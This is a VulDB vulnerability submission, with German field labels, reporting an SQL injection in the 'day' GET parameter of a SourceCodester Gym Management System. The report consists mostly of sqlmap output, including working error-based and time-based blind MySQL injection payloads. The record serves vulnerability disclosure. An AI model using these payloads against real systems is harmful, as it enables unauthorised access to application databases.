| Titel | Gym-Management-System-Sqlinjection |
|---|
| Beschreibung | Gym-Management-System-Sqlinjection
After logging in to the background The injection point is in DAY module
Injection details:
---
GET parameter 'day' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1138 HTTP(s) requests:
---
Parameter: day (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: day=5' AND (SELECT 4229 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(4229=4229,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qlux
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: day=5' AND (SELECT 2288 FROM (SELECT(SLEEP(5)))nWwM)-- RfYv
---
[12:24:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
--- |
|---|
| Quelle | ⚠️ https://github.com/gdianq/Gym-Management-System-Sqlinjection/blob/main/README.md |
|---|
| Benutzer | gdianq (UID 30613) |
|---|
| Einreichung | 07.08.2022 10:34 (vor 4 Jahren) |
|---|
| Moderieren | 07.08.2022 10:37 (3 minutes later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 205821 [SourceCodester Gym Management System GET Parameter Tag SQL Injection] |
|---|
| Punkte | 20 |
|---|